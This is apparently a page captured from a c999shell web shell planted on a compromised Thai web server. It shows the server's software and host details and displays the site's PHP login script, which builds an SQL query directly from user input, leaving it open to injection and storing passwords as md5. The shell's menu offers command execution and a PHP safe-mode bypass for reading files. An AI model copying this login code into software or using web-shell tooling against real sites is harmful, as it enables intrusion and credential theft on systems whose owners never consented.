Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /var/www/html/manage/ drwxr-xr-x | |
| Viewing file: Select action/file-type: <?php
session_start();
include("./include/FunctionDB.php");
ConnectDB();
$Username = $_REQUEST["Username"];
$Password = $_REQUEST["Password"];
if($Username && $Password)
{
$Password = md5($Password);
$sql = "SELECT * FROM user_tb WHERE (Username ='$Username' AND Password='$Password') AND Flag IN ('0','1')";
$result = mysql_query($sql) or die(" $result".mysql_error());
$row = mysql_num_rows($result);
$rs = mysql_fetch_array($result);
$Priority = $rs["Priority"];
$_SESSION['valid_user'] = $Username;
$_SESSION['priority'] = $priority;
$_SESSION['password'] = $Password;
if( $row < 1 )
{
?>
<body bgcolor="#"><br>
<center> <font face="Tohama" size="5" color="#FF0000">ชื่อผู้ใช้ หรือ รหัสผ่าน ไม่ถูกต้อง กรุณากรอกใหม่ค่ะ</font>
</center>
<!--<meta http-equiv="refresh" content="3;URL=login.php">-->
<meta http-equiv="refresh" content="1;URL=login.php">
<!-- <meta http-equiv="Content-Type" content="text/html; charset=TIS-620">
<link href="./source/style.css" rel="stylesheet" type="text/css">-->
<?php
}
else
{
$sql = "SELECT * FROM permission_tb WHERE permision='$Priority' ";
$result2 = mysql_query($sql) or die(" $result".mysql_error());
$rss = mysql_fetch_array($result2);
session_register("valid_user");
session_register("password") ;
session_register("Priority") ;
$goto = $rss["url"];
// header("$goto");
//header("Location: $goto");
echo "<meta http-equiv=\"refresh\" content=\"0;URL=$goto\">";
}
}
else
{
?>
<br>
<center> <font face="Tohama" size="5" color="#FF0000">กรุณากรอก ชื่อผู้ใช้ และรหัสผ่าน ก่อนเข้าระบบค่ะ </font>
</center><br>
<!-- <meta http-equiv="refresh" content="3;URL=login.php">-->
<meta http-equiv="refresh" content="1;URL=login.php">
</body>
<?php
}
?> |
:: Command execute :: | |
:: Shadow's tricks :D :: | |
Useful Commands
|
|
:: Preddy's tricks :D :: | |
Php Safe-Mode Bypass (Read Files)
|
|
--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0059 ]-- |